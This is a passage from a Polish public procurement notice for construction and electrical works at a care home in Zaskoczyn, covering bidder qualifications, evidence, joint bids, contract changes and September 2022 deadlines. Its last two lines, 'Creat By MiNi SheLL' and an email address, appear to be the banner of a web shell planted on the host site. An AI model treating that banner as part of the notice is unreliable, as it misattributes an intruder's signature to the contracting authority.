zakresem wymianę instalacji<br/>elektrycznej, prace tynkarskie, o łącznej wartości nie mniejszej niż 100 000,00 zł brutto.<br/>Ocena wykazania spełnienia warunku nastąpi na podstawie przedstawionych przez Wykonawcę dokumentów, o których<br/>mowa w rozdz. X ust. 1 pkt 1 lit. a) SWZ (wzór wykazu należycie wykonanych robót budowlanych stanowi załącznik nr 4 do<br/>SWZ).<br/>Jeżeli Wykonawca w celu potwierdzenia spełniania warunków udziału w postępowaniu polega na zdolnościach technicznych<br/>lub zawodowych innego podmiotu, powyższy warunek zostanie uznany za spełniony jeżeli spełnia go w całości ten podmiot.<br/>UWAGA:<br/>W przypadku, gdy rozliczenie za zrealizowane (wykonane) przez Wykonawcę roboty budowlane nastąpiło w innej niż w PLN<br/>walucie, Wykonawca w celu potwierdzenia spełniania warunku udziału w niniejszym postępowaniu zobowiązany jest do<br/>przeliczenia wartości wykonanych robót budowlanych przyjmując średni kurs złotego w stosunku do walut obcych określony<br/>w tabeli kursów średnich walut obcych Narodowego Banku Polskiego opublikowanych na dzień zamieszczenia Ogłoszenia o<br/>zamówieniu oraz Specyfikacji Warunków Zamówienia na stronie internetowej prowadzonego postępowania.<br/>2) Osób skierowanych przez wykonawcę do realizacji zamówienia:<br/>Zamawiający uzna warunek za spełniony jeżeli Wykonawca wykaże, że skieruje do realizacji zamówienia, 2 osoby<br/>posiadające odpowiednie uprawnienia budowlane określone przepisami ustawy z dnia 7 lipca 1994 r. Prawo budowlane (t.j.<br/>Dz. U. z 2020 poz. 1333 ze zm.), dalej nazywanej „ustawa Prawo budowlane”, niezbędnych do wykonania zamówienia tj.<br/>dysponuje lub będzie dysponował na etapie realizacji umowy w sprawie niniejszego zamówienia publicznego następującymi<br/>osobami zdolnymi do wykonania zamówienia:<br/>a) jedną osobą, która obejmie funkcję kierownika budowy branży konstrukcyjno-budowlanej, przy czym osoba ta pełnić<br/>będzie role wiodącą w zespole kierowników budowy, posiadającą uprawnienia budowlane do kierowania robotami<br/>budowlanymi bez ograniczeń w specjalności konstrukcyjno-budowlanej wydane na podstawie ustawy Prawo budowlane (lub<br/>odpowiadające im ważne uprawnienia, które zostały wydane na podstawie wcześniej obowiązujących przepisów prawa<br/>polskiego lub odpowiednie uprawnienia przysługujące na podstawie odrębnych przepisów prawa polskiego i wspólnotowego<br/>- w szczególności kwalifikacje zawodowe uznane na podstawie art. 12a ustawy Prawo budowlane lub prawo do<br/>tymczasowego i okazjonalnego wykonywania zawodu, o którym mowa w art. 20a ustawy z dnia 15 grudnia 2000 r. o<br/>samorządach zawodowych architektów, inżynierów budownictwa oraz urbanistów (t.j. Dz. U. z 2019 r. poz. 1117 ze zm.) w<br/>zakresie niezbędnym do wykonania przedmiotu zamówienia), posiadającą co najmniej 3-letnie doświadczenie zawodowe w<br/>pełnieniu funkcji kierownik budowy.<br/>b) jedną osobą, która obejmie funkcję kierownika robót branży elektrycznej posiadającą uprawnienia budowalne do<br/>kierowania robotami budowlanymi bez ograniczeń w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń<br/>elektrycznych, zgodnie z rozporządzeniem Ministra Infrastruktury i Rozwoju z dnia 29 kwietnia 2019 r. w sprawie<br/>przygotowania zawodowego do wykonywania samodzielnych funkcji technicznych w budownictwie (Dz. U. z 2019 r., poz.<br/>831) (lub odpowiadające im ważne uprawnienia, które zostały wydane na podstawie wcześniej obowiązujących przepisów<br/>prawa polskiego lub odpowiednie uprawnienia przysługujące na podstawie odrębnych przepisów prawa polskiego i<br/>wspólnotowego - w szczególności kwalifikacje zawodowe uznane na podstawie art. 12a ustawy Prawo budowlane lub prawo<br/>do tymczasowego i okazjonalnego wykonywania zawodu, o którym mowa w art. 20a ustawy z dnia 15 grudnia 2000 r. o<br/>samorządach zawodowych architektów, inżynierów budownictwa oraz urbanistów (t.j. Dz. U. z 2019 r. poz. 1117 ze zm.) w<br/>zakresie niezbędnym do wykonania przedmiotu zamówienia).<br/>Ocena wykazania spełnienia warunku nastąpi na podstawie przedstawionych przez Wykonawcę dokumentów, o których<br/>mowa w Rozdz. X ust. 1 pkt 1 lit. b) SWZ (wzór wykazu osób skierowanych przez wykonawcę do realizacji zamówienia<br/>publicznego stanowi załącznik nr 5 do SWZ).<br/>3. Oceniając zdolność techniczną lub zawodową, zamawiający może, na każdym etapie postepowania, uznać, że<br/>wykonawca nie posiada wymaganych zdolności, jeżeli posiadanie przez wykonawcę sprzecznych interesów, w<br/>szczególności zaangażowanie zasobów technicznych lub zawodowych wykonawcy w inne przedsięwzięcia gospodarcze<br/>wykonawcy może mieć negatywny wpływ na realizację zamówienia.<br/>4. W odniesieniu do warunków dotyczących wykształcenia, kwalifikacji zawodowych lub doświadczenia, wykonawcy<br/>wspólnie ubiegający się o udzielenie zamówienia mogą polegać na zdolnościach tych z wykonawców, którzy wykonają<br/>roboty budowlane lub usługi, do realizacji których te zdolności są wymagane. W takiej sytuacji wykonawcy są zobowiązani<br/>dołączyć do oferty oświadczenie, z którego wynika, które roboty budowlane, dostawy lub usługi wykonają poszczególni<br/>wykonawcy.<br/>5. W przypadku posługiwania się przez wykonawcę cudzym potencjałem (podmiot trzeci), wykonawcy mogą polegać na<br/>zdolnościach podmiotów udostępniających zasoby, jeśli podmioty te wykonają roboty budowlane lub usługi, do realizacji<br/>których te zdolności są wymagane <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">1.<br/>Zamawiający żąda podmiotowych środków dowodowych na<br/>potwierdzenie spełnienia warunków udziału w postępowaniu, tym samym:<br/>1) Zgodnie z art. 274 ust. 1 ustawy Pzp, zamawiający przed wyborem najkorzystniejszej oferty wezwie<br/>wykonawcę, którego oferta została najwyżej oceniona, do złożenia w wyznaczonym terminie, nie<br/>Ogłoszenie nr z dnia<br/>Biuletyn Zamówień Publicznych Ogłoszenie o zamówieniu - Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy - Roboty budowlane<br/>krótszym niż 5 dni od dnia wezwania, aktualnych na dzień złożenia, następujących podmiotowych<br/>środków dowodowych:<br/>a) wykaz robót budowlanych (według wzoru stanowiącego załącznik nr 4 do SWZ) wykonanych nie<br/>wcześniej niż w okresie ostatnich 5 lat, a jeżeli okres prowadzenia działalności jest krótszy - w tym<br/>okresie, wraz z podaniem ich rodzaju, wartości, daty i miejsca wykonania oraz podmiotów, na rzecz<br/>których roboty te zostały wykonane, oraz załączeniem dowodów określających, czy te roboty<br/>budowlane zostały wykonane należycie, przy czym dowodami, o których mowa, są referencje bądź<br/>inne dokumenty sporządzone przez podmiot, na rzecz którego roboty budowlane zostały wykonane, a<br/>jeżeli wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów - inne<br/>odpowiednie dokumenty (na potwierdzenie spełnienia warunku udziału w postępowaniu określonego w<br/>rozdz. VIII ust. 2 pkt 1 SWZ). Wskazany 5-letni okres, o którym mowa w zdaniu poprzedzającym należy<br/>liczyć wstecz od dnia, w którym upływa (upłynął) termin składania ofert w niniejszym postępowaniu.<br/>UWAGA:<br/>Jeżeli wykonawca powołuje się na doświadczenie w realizacji robót budowlanych wykonywanych<br/>wspólnie z innymi wykonawcami, wykaz o którym mowa w ust. 1 pkt 1 lit a), dotyczy tylko tych robót<br/>budowlanych, w których wykonaniu wykonawca ten bezpośrednio uczestniczył.<br/>b) wykaz osób (według wzoru stanowiącego załącznik nr 5 do SWZ), skierowanych przez wykonawcę<br/>do realizacji zamówienia publicznego wraz z informacjami na temat ich kwalifikacji zawodowych,<br/>uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia publicznego, a<br/>także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi<br/>osobami (na potwierdzenie spełnienia warunku udziału w postępowaniu określonego w rozdz. VIII ust.<br/>2 pkt 2 SWZ).<br/>2) Jeżeli zachodzą uzasadnione podstawy do uznania, że uprzednio złożone podmiotowe środki<br/>dowodowe nie są już aktualne, zamawiający może w każdym czasie wezwać wykonawcę lub<br/>wykonawców do złożenia wszystkich lub niektórych podmiotowych środków dowodowych, aktualnych<br/>na dzień ich złożenia.<br/>3) Zamawiający nie wzywa do złożenia podmiotowych środków dowodowych, jeżeli może je uzyskać<br/>za pomocą bezpłatnych i ogólnodostępnych baz danych, w szczególności rejestrów publicznych w<br/>rozumieniu ustawy z 17 lutego 2005 r. o informatyzacji działalności podmiotów realizujących zadania<br/>publiczne, o ile wykonawca wskazał w oświadczeniu wstępnym dane umożliwiające dostęp do tych<br/>środków.<br/>2. Zamawiający nie żąda podmiotowych środków dowodowych na potwierdzenie braku podstaw<br/>wykluczenia. Tym samym, zamawiający dokona weryfikacji wyłącznie na podstawie oświadczenia<br/>wstępnego, o którym mowa w Rozdziale IX. ust. 2 pkt 1 SWZ<br/>3. Podmiotowe środki dowodowe oraz inne dokumenty lub oświadczenia, jakich może żądać Zamawiający od Wykonawcy, o których<br/>mowa w Rozporządzeniu Ministra Rozwoju, Pracy i Technologii<br/>z dnia 23 grudnia 2020 r., składa się w formie elektronicznej, w postaci elektronicznej opatrzonej<br/>podpisem zaufanym lub podpisem osobistym, w formie pisemnej lub w formie dokumentowej, wzakresie i w sposób określony w<br/>przepisach rozporządzenia wydanego na podstawie art. 70 ustawy<br/>Pzp</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Zamawiający nie żąda<br/>podmiotowych środków dowodowych na potwierdzenie braku podstaw<br/>wykluczenia. Tym samym, zamawiający dokona weryfikacji wyłącznie na podstawie oświadczenia<br/>wstępnego, o którym mowa w Rozdziale IX. ust. 2 pkt 1 SWZ</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> Zamawiający nie żąda złożenia przez wykonawcę przedmiotowych środków dowodowych. <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> W przypadku wspólnego ubiegania się wykonawców o udzielenie zamówienia zamawiający<br/>zbada, czy nie zachodzą podstawy wykluczenia wobec każdego z tych wykonawców. W<br/>odniesieniu do warunków dotyczących wykształcenia, kwalifikacji zawodowych lub<br/>doświadczenia, wykonawcy wspólnie ubiegający się o udzielenie zamówienia mogą polegać na<br/>zdolnościach tych z wykonawców, którzy wykonają roboty budowlane lub usługi, do realizacji<br/>których te zdolności są wymagane. W takiej sytuacji wykonawcy są zobowiązani dołączyć do<br/>oferty oświadczenie, z którego wynika, które roboty budowlane, dostawy lub usługi wykonają<br/>poszczególni wykonawcy. Wykonawca dołącza do oferty oświadczenie o niepodleganiu<br/>wykluczeniu w zakresie wskazanym w rozdziale VII ust. 2 SWZ oraz spełnianiu warunków<br/>Ogłoszenie nr z dnia<br/>Biuletyn Zamówień Publicznych Ogłoszenie o zamówieniu - Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy - Roboty budowlane<br/>udziału w postępowaniu w zakresie wskazanym w rozdziale VIII ust. 2 SWZ. Oświadczenie to<br/>stanowi dowód potwierdzający brak podstaw wykluczenia oraz spełnianie warunków udziału w<br/>postępowaniu, na dzień składania ofert, tymczasowo zastępujący wymagane podmiotowe środki<br/>dowodowe, wskazane w rozdziale X SWZ.<br/>Oświadczenie składają odrębnie każdy spośród wykonawców wspólnie ubiegających się o<br/>udzielenie zamówienia. W takim przypadku oświadczenie potwierdza brak podstaw wykluczenia<br/>wykonawcy oraz spełnianie warunków udziału w postępowaniu w zakresie, w jakim każdy z<br/>wykonawców wykazuje spełnianie warunków udziału w postępowaniu; W przypadku<br/>wykonawców wspólnie ubiegających się o udzielenie zamówienia wykonawcy zobowiązani są do<br/>ustanowienia pełnomocnika. Dokument pełnomocnictwa, z treści którego będzie wynikało<br/>umocowanie do reprezentowania w postępowaniu o udzielenie zamówienia tych wykonawców<br/>albo do reprezentowania w postępowaniu i zawarciu umowy w sprawie zamówienia publicznego<br/>należy załączyć do oferty. 6. W przypadku wykonawców ubiegających się wspólnie o udzielenie<br/>zamówienia do oferty należy załączyć pełnomocnictwo dla pełnomocnika do reprezentowania<br/>ich w postępowaniu o udzielenie zamówienia albo do reprezentowania w postępowaniu i<br/>zawarcia umowy w sprawie zamówienia publicznego. Jeżeli wykonawca powołuje się na<br/>doświadczenie w realizacji robót budowlanych wykonywanych wspólnie z innymi wykonawcami,<br/>wykaz o którym mowa w rozdz. X ust. 1 pkt 1 lit a) SWZ, dotyczy tylko tych robót budowlanych,<br/>w których wykonaniu wykonawca ten bezpośrednio uczestniczył. 2. Jeżeli zostanie wybrana<br/>oferta wykonawców wspólnie ubiegających się o udzielenie zamówienia, zamawiający będzie<br/>żądał przed zawarciem umowy w sprawie zamówienia publicznego kopii umowy regulującej<br/>współpracę tych wykonawców, w której m.in. zostanie określony pełnomocnik uprawniony do<br/>kontaktów z zamawiającym oraz do wystawiania dokumentów związanych z płatnościami, przyczym termin, na jaki została<br/>zawarta umowa, nie może być krótszy niż termin realizacji<br/>zamówienia. Wraz z ofertą należy złożyć: 5) Oświadczenie wykonawców wspólnie ubiegających<br/>się o udzielenie zamówienia:<br/>W odniesieniu do warunków dotyczących wykształcenia, kwalifikacji zawodowych lub<br/>doświadczenia, wykonawcy wspólnie ubiegający się o udzielenie zamówienia mogą polegać na<br/>zdolnościach tych z wykonawców, którzy wykonają roboty budowlane lub usługi, do realizacji<br/>których te zdolności są wymagane. W takiej sytuacji wykonawcy są zobowiązani dołączyć do<br/>oferty oświadczenie, z którego wynika, które roboty budowlane, dostawy lub usługi wykonają<br/>poszczególni wykonawcy. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1. Zmiana postanowień umowy może nastąpić za zgodą obydwu stron wyrażoną na<br/>piśmie , w formie aneksu do umowy z zachowaniem formy pisemnej pod rygorem nieważności<br/>takiej zmiany.<br/>2. Zamawiający dopuszcza możliwość zmiany umowy w przypadkach określonych w art. 455<br/>ust. 1 pkt 2 – 4 i ust. 2 ustawy Pzp oraz przewiduje zgodnie z art. 455 ust. 1 pkt 1) ustawy Pzp<br/>możliwość zmiany postanowień Umowy określając następujący rodzaj i zakres oraz warunki<br/>zmiany postanowień Umowy:<br/>1) zmiana terminu realizacji umowy w przypadku wystąpienia którejkolwiek z okoliczności<br/>wymienionych niżej, termin wykonania umowy może ulec odpowiedniemu przedłużeniu o czas<br/>niezbędny do zakończenia wykonywania jej przedmiotu w sposób należyty, nie dłużej jednak niż<br/>o okres trwania tych okoliczności:<br/>a) konieczności zmian będących następstwem działania organów nadzorczo –kontrolnych,<br/>b) konieczności wprowadzenia zmian w dokumentacji projektowej,<br/>c) wystąpienia konieczności przeprowadzenia robót zamiennych, które wstrzymują lub opóźniają<br/>realizację przedmiotu umowy;<br/>d) nieprzekazania terenu budowy przez Zamawiającego w terminie określonym w § 3 ust. 1 pkt<br/>2;<br/>e) przerwy w realizacji robót powstałej z przyczyn zależnych od Zamawiającego;<br/>f) działania siły wyższej (np. klęski żywiołowej, wystąpienie pandemii ), mającej bezpośredni<br/>wpływ na terminowość wykonania robót;<br/>3. Wskazane powyżej zmiany mogą zostać wprowadzone jedynie w przypadku jeżeli obie Strony<br/>umowy zgodnie uznają, że zaszły wskazane wyżej okoliczności oraz wprowadzenie zmian jest<br/>niezbędne dla prawidłowej realizacji zamówienia.<br/>4. Zmiana terminu wykonania Umowy dopuszczalne jest tylko wraz z przedłużeniem okresu<br/>ważności zabezpieczenia należytego wykonania Umowy lub wniesieniem nowego<br/>zabezpieczenia należytego wykonania Umowy na przedłużony termin wykonania zamówienia i<br/>uznania go przez Zamawiającego za należycie wykonane, z zachowaniem ciągłości<br/>zabezpieczenia i bez zmniejszenia jego wysokości.<br/>5. Zamawiający przewiduje również możliwość zmiany osób wskazanych w §5 ust. 1 do<br/>realizacji przedmiotu umowy na następujących warunkach:<br/>1) z wyjątkiem przypadków zaakceptowanych na piśmie przez Zamawiającego, Wykonawca nie<br/>może dokonywać żadnych zmian swojego personelu zaangażowanego do realizacji Umowy,<br/>2) w przypadkach uzasadnionych Zamawiający może żądać zmiany poszczególnych osób<br/>wchodzących w skład personelu Wykonawcy zaangażowanego do realizacji Umowy,3) jeżeli z jakichkolwiek powodów<br/>koniecznym stanie się zastąpienie jakiegokolwiek członka<br/>personelu, Wykonawca zatrudni, za zgodą Zamawiającego, osobę o tych samych lub wyższych<br/>kwalifikacjach, o których mowa w SWZ. Ewentualna odmowa zgody Zamawiającego na<br/>zatrudnienie osoby wskazanej przez Wykonawcę powinna zostać uzasadniona na piśmie,<br/>4) jeżeli Wykonawca poweźmie wiadomość, że którykolwiek członek personelu został skazany<br/>prawomocnym wyrokiem sądu za przestępstwo popełnione w celu osiągnięcia korzyści<br/>majątkowej lub na mocy którego został orzeczony zakaz zajmowania określonego stanowiska,<br/>wykonywania określonego zawodu lub prowadzenia określonej działalności gospodarczej –<br/>niezwłocznie zawiadomi na piśmie o tym fakcie Zamawiającego, jednocześnie przedstawiając<br/>Zamawiającemu do akceptacji inną osobę o tych samych lub wyższych kwalifikacjach,<br/>5) w sytuacji przewidzianej powyżej Zamawiający dokona wymiany personelu na<br/>zaproponowany przez Wykonawcę, o ile wskazana osoba spełnia wymogi dotyczące jego<br/>kwalifikacji,<br/>6) Wykonawcy nie przysługuje roszczenie o zwrot kosztów wynikających bezpośrednio lub<br/>pośrednio z usunięcia lub wymiany personelu.<br/>Pozostały warunki możliwości zmiany umowy zostały określone w § 17 ust. 6-19 Załącznika nr 6<br/>do SWZ <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2022-09-26 12:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://patformazakupowa.pl</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2022-09-26 12:10</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> 1. Zamawiający zaleca, aby Wykonawca dokonał wizji lokalnej miejsca roboty budowlanej, aby uzyskać informacje, które<br/>mogą okazać się konieczne do przygotowania oferty oraz zawarcia umowy i wykonania zamówienia. Wizja lokalna zostanie<br/>przeprowadzona w dniu 19.09.2022r. o godz. 10.00 – zbiórka Wykonawców odbędzie się przed wejściem głównym do<br/>budynku DPS, Zaskoczyn 11, 83-041 Mierzeszyn.<br/>2. Wykonawca zobowiązany jest posiadać przez cały okres obowiązywania Umowy oraz przez okres trzech miesięcy po jej<br/>zakończeniu ubezpieczenie odpowiedzialności cywilnej na sumę nie mniejszą niż 50 000,00 złotych (pięćdzisiąt tysięcy złotych 00/100). Zakres polisy określa §19 wzoru umowy, stanowiącej załącznik nr 6 do SIWZ.

Creat By MiNi SheLL
Email: jattceo@gmail.com